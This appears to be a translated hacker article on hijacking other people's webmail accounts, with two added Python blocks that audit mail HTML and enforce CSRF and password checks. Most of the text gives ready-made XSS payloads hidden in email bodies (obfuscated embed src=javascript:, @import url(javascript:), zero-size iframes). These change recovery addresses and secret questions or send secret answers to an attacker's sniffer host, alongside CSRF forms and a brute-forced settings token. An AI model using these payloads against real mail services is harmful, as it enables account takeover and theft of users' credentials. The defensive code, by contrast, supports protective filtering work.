

We continue with web mail. I did a little research into hacking various services and present the results here. The attack technique stays the same: an email containing JavaScript that runs when the message is opened is sent to someone else's address and changes some item in the user's mailbox settings. It makes no sense to describe each server in detail, since the approach is the same everywhere, so I will give a few examples and a table at the end. In most cases the hack can be considered 100% reliable, with some assumptions: the user must read mail through the web interface, and when writing the exploits I assumed a standard platform, that is, I take it that the user does not have some exotic OS or a browser with JS disabled.


I'll start with the No. 1 mail service in Russia. At the moment, thanks to JavaScript getting through the filter and one developer error, it is possible to break into a mailbox there. I assume the basic principles are well known. How do you get the password? 1 - Simply change it. This will not work: you need to know the current one. 2 - Change the secret question and use the "forgotten password" service. This will not work either. 3 - Set your own alternative email to receive a new, system-generated password. This does not work: the last two options live in the same form and are also password protected. Even the other settings of less interest to us (first name, surname, etc.) can no longer be changed without entering the current password. It would seem there are no options left. However, there is a secondary, inconspicuous settings section, "Contact information" (ICQ, website, phone, place of work, time zone, etc.). In this section you can also specify a contact email. The trick is that at the same time the alternative address in the registration information changes to the one entered in the profile, and now you can obtain the password for the mailbox using the reminder service. Simple. URL: However, settings in the mailbox cannot be changed with the GET method, so I will describe the technical side of the matter in detail.

I. We send a letter to the target mailbox with code that generates a frame directly in the body of the letter, pointing at our website. Ideally the script should work without any user interaction (click, mouse over, image loading, etc.):

<embed src="javascript: document.getElementById('xxx').innerHTML = '<iframe src=http://></iframe>'; this.wav">
<p id='xxx'>
To make the script work reliably, and to disguise it, we transform it into:
<embed src="javascript: status = location; document.getElementById('xxx').innerHTML = '<iframe src=http:// width=0 height=0></iframe>'; this.wav" width=0 height=0>
<p id='xxx'>
In this form, character codes replace the letters in the names of the javascript and iframe elements, and the mail script does not filter them. The line status = location; shows a local URL in the status bar so that a foreign one flashing there does not arouse suspicion. The width and height attributes, of both the frame and the embed, are set to zero and make them invisible.

II. On our resource we place an HTML document with a form that sends the changed data to the server.

Content of yourscript.html:
<form method="post" action="" name="anketa">
<input type="hidden" name="page" value="2">
<input type="hidden" name="Email" value="">
<input type="hidden" value="Save" name="Save">
</form>
<script>
document.anketa.submit();
</script>
Notes: the client part of the script is guaranteed to work unchanged only in IE; the submission form is placed on a separate site specifically to keep the letter itself light.


Now a slightly different kind of security bug, for example: if you use the password reminder service, then to obtain the password it is enough to enter the correct answer to your secret question (one of the options). So we set ourselves the task of getting this answer. It is done easily. When I went into the mailbox properties and looked through the registration information, I saw that the answer to the secret question was not hidden, which lets us read its value with JavaScript.

We inject the script through the style tag.
Address of the settings page:
Form name: profileform
Name of the text field holding the secret answer: hint_a
As a result, to steal the secret answer you need to load the settings page, run JavaScript, take the value of document.profileform.hint_a.value and pass it to the sniffer together with the REQUEST_URI environment variable.

Ready-made version:
<style>@import url(javascript: document.getElementById('out').innerHTML = "<iframe src=http:// name='zero' %6FnLoad=`str =; path='http://'; = path + str`></iframe>");</style>
<span id='out'></span>
The settings page is loaded in the generated frame named zero. Once it has loaded, the OnLoad handler runs the script that reads the secret answer and then, through the same frame, sends the result to the sniffer. Now all that remains is to open the sniffer log and find the needed information in the "Host" line.
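The filtering side of the tricks in sections I and II above (embed src=javascript: with character-coded letters, @import url(javascript:) in a style tag, and the %6FnLoad-encoded handler name), as an added defender-side example that is not part of the original article: a checker a webmail front end can run over a message body before rendering it, which decodes the obfuscations before matching. The sample message and all function names are constructed for this example.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import unquote

SCRIPT_SCHEMES = ("javascript:", "vbscript:")      # URL schemes the browser executes
URL_ATTRS = {"src", "href", "action", "background"}

def normalize(value: str) -> str:
    # Undo the obfuscations the article relies on: character references (&#106;avascript),
    # percent-encoding (%6FnLoad), inserted whitespace/control chars; repeat until stable.
    prev = None
    while prev != value:
        prev, value = value, unquote(html.unescape(value))
    return re.sub(r"[\s\x00-\x1f]+", "", value).lower()
def is_script_url(value: str) -> bool:
    return normalize(value).startswith(SCRIPT_SCHEMES)

def style_has_script_url(css: str) -> bool:        # @import url(javascript:), background:url(javascript:)
    return re.search(r"url\(['\"]?(javascript|vbscript):", normalize(css)) is not None

class MailHtmlAuditor(HTMLParser):
    # Collects (tag, attribute, finding) for everything that would run script on render.
    def __init__(self):
        super().__init__()
        self.findings, self._in_style = [], False
    def handle_starttag(self, tag, attrs):
        self._in_style = tag == "style"
        for name, val in attrs:
            name = normalize(name)                 # &#111;nLoad / %6FnLoad -> onload
            if name.startswith("on"):
                self.findings.append((tag, name, "event handler"))
            elif name in URL_ATTRS and is_script_url(val or ""):
                self.findings.append((tag, name, "script url"))
            elif name == "style" and style_has_script_url(val or ""):
                self.findings.append((tag, name, "script url in css"))
    def handle_endtag(self, tag):
        self._in_style = False
    def handle_data(self, data):                   # a <style> body arrives here as text
        if self._in_style and style_has_script_url(data):
            self.findings.append(("style", "url()", "script url in css"))

def audit_mail_html(body: str) -> list:
    auditor = MailHtmlAuditor()
    auditor.feed(body)
    auditor.close()
    return auditor.findings

# Constructed sample message: the article's three vectors plus one harmless image.
SAMPLE_MAIL = ('<embed src="&#106;avascript:alert(1)" width=0 height=0><style>@import url(javascript:alert(2));</style>'
               '<iframe src=http://example.invalid/ &#111;nLoad="x()"></iframe><img src="http://example.invalid/a.gif">')
```

A filter that matched the literal string "javascript:" against the raw attribute, as the mail scripts in the article evidently did, finds none of the three.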


In my opinion this is quite a popular mailer, so I will describe it in detail. Moreover, getting someone else's account there is much easier than it seems at first glance. You could do it like this: send an email with a script that, when run, obtains the session id, generates the necessary requests, and changes the alternative email (to which the password will later be sent) and the secret question and answer. However, if you specify any other address in the reminder form, the password will be sent there as long as the secret answer is correct. And one more observation: the session id is not needed at all to change the settings. Plus, any tags are allowed. All of the above reduces the code to a couple of lines:
<iframe src=http:// cp_msg=1&cp_quest=QUESTION&cp_answ=ANSWER width=0 height=0></iframe>


The way this one is hacked does not quite fit the general theme of the article, but it is still mail :). When I needed to get the password for one mailbox, I registered my own account as usual and began to investigate the system. The first thing that caught my eye was the ability to set a new password and a secret question with an answer without entering the old password. The usual plan: check tag filtering, get the ID, and execute the request. However, changing the settings used a special variable utoken, which is contained in the body of the document. Experimenting with changing the question and answer with a previously known utoken: ВОПРОС&panswer=ОТВЕТ panswer=ВОПРОС&panswer=ОТВЕТ I came to the conclusion that neither the ID nor cookies are required to change the settings. At the same time, watching utoken, I found that the four-digit hexadecimal number after the email address lies in a very narrow range. Namely, to set a secret question and answer on any mailbox of interest to us, a total of 7 options need to be tried: 5a00, 5b00, 5c00, 5d00, 5e00, 5f00, 6000. When the number is guessed, we get into the right box.

Notes: there have been some changes since then. The password recovery service does not work, so it makes sense to change the password immediately. The address for changing settings has also changed: ВОПРОС&panswer=ОТВЕТ The method will not work forever. Probably it is still required that the user logs into the mail via the web from time to time.
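The server-side checks whose absence the four services above share (a settings change accepted over GET from an iframe, an auto-submitted form on a foreign site, a secondary form such as "Contact information" that rewrites the alternative address without the password, and a guessable utoken in place of a session-bound random token), as an added example that is not code from any of the services described. The dict-based session, the field names and the clear-text password comparison are constructed for this example.

```python
import hmac
import secrets

# Fields whose change lets a password be recovered. "contact_email" is listed because, as
# with the first service above, a secondary profile form may silently update the alternative address.
SENSITIVE_FIELDS = {"alt_email", "contact_email", "secret_question", "secret_answer", "password"}

def new_session(user: str, password: str) -> dict:
    # A 128-bit random token bound to this session, unlike a 4-hex-digit utoken that lies
    # in a 7-value range and sits in the page body for any injected script to read.
    return {"user": user, "password": password, "csrf": secrets.token_hex(16),
            "settings": {"alt_email": "", "contact_email": "", "secret_answer": "", "timezone": ""}}

def change_settings(session: dict, method: str, form: dict) -> tuple:
    """Apply a settings update from a submitted form; returns (saved, reason)."""
    if method != "POST":                                   # <iframe src=...> can only issue GET
        return False, "state change over GET refused"
    if not hmac.compare_digest(form.get("csrf", ""), session["csrf"]):
        return False, "missing or wrong CSRF token"        # foreign auto-submitted form
    changes = {k: v for k, v in form.items() if k in session["settings"]}
    if changes.keys() & SENSITIVE_FIELDS and not hmac.compare_digest(
            form.get("current_password", ""), session["password"]):
        return False, "current password required for this field"
    session["settings"].update(changes)
    return True, "saved"
```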

Table with the characteristics of free WWW-servers

Method | What it allows | Services
img src=javascript: | Read the password from the settings page, from the password field | , , ,
embed src=javascript: | Change the alternate email | , , , , etc.
@import url(javascript:); | The settings show the answer to the secret question | , , ,
Any way | Read / change question and answer. Password is valid and same mailer | about 80 domains
img src=javascript:, style=background:url(javascript:) | Steal the answer to the secret question, if one is set. A forwarding address can also be set (copies are not saved) |
OnError, OnLoad | Delete the site* (JS is not required) |
embed src=javascript: this.wav> | Read the answer to the secret question | , , , , , , ,
embed src="javascript: | Swap / steal the answer to the secret question | , , , , and others
In many ways | Delete the account |
embed src=javascript: | Read the secret answer |